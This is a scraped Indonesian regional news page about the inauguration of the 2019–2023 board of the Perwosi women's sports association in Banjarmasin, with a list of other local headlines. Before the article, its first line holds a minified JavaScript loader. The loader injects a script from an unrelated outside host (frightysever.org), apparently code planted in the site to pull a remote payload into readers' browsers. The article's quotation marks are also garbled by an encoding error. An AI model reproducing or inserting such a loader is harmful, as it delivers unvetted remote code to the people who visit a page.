(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
BANJARMASIN, Kepengurusan Persatuan Wanita Olahraga Seluruh Indonesia (Perwosi) Kota Banjarmasin kembali dibentuk. Kepengurusan untuk periode tahun 2019 sampai 2023 dilantik dan dikukuhkan langsung Ketua Pengurus Provinsi Perwosi Kalsel, Marlian Karim, di panggung siring Balaikota Banjarmasin, Sabtu (27/7).
Pembentukan PERWOSI yang baru ini diharapkan, dapat menyukseskan program-program yang telah ditetapkan pada musyawarah olahraga Kota Banjarmasin, dalam rangka untuk mencapai hasil terbaik dan menghasilkan atlet-atlet yang berprestasi di semua cabang olahraga.
Hermansyah mengatakan, fungsi dan tugas Perwosi sebagai fungsional KONI, harus dilakukan untuk membudayakan olahraga kepada masyarakat terutama kaum wanita dan keluarga, agar sehat dan bugar, maka akan tercipta atlet yang berprestasi.
“Ajak masyarakat Kota Banjarmasin untuk selalu cinta dengan olahraga, untuk mendapatkan tubuh yang sehat dan bugar,†ujar Hermansyah.
Lebih lanjut dikatakanya,diperlukan kerja ekstra dan kerja keras bagi Pengurus Perwosi Kota Banjarmasin yang baru, dalam melaksanakan sosialisasi dan pembinaan.
“Mudah-mudahan kepercayaan dan amanah ini dapat dilaksanakan dengan sebaik-baiknya, penuh tanggung jawab dengan semangat kebersamaan dan keikhlasan, sekaligus sosialisasi adanya pengurus Perwosi Kota Banjarmasin,†katanya.
Dalam kegiatan pelantikan Perwosi Kota Banjarmasin dihadiri Ketua Pengurus Perwosi Kalsel, Ketua Harian, Wakil Ketua dan Sekretaris KONI Kota Banjarmasin. (mario)
KANALKALIMANTAN.COM, MARTAPURA – Banjir yang melanda Desa Gudang Hirang, Kecamatan Sungaitabuk, Kabupaten Banjar menggenangi sejumlah… Read More
KANALKALIMANTAN.COM, YOGYAKARTA - Ada tempat yang tidak perlu banyak kata untuk membuat orang betah. Begitu… Read More
KANALKALIMANTAN.COM, MARTAPURA – Banjir setinggi lutut orang dewasa menggenangi seluruh jalan di Komplek Antasari Perdana… Read More
KANALKALIMANTAN.COM, MARTAPURA - Banjir di Kabupaten Banjar masih belum menunjukkan penurunan ketinggian air secara signifikan,… Read More
Upah Minimum Provinsi (UMP) Kalimantan Timur 2026 telah ditetapkan dan ditandatangani oleh Gubernur Rudy Mas’ud… Read More
KANALKALIMANTAN.COM, BANJARMASIN – Mengawali pergantian tahun, Kota Banjarmasin diguyur hujan dari pagi hingga petang, Kamis… Read More
This website uses cookies.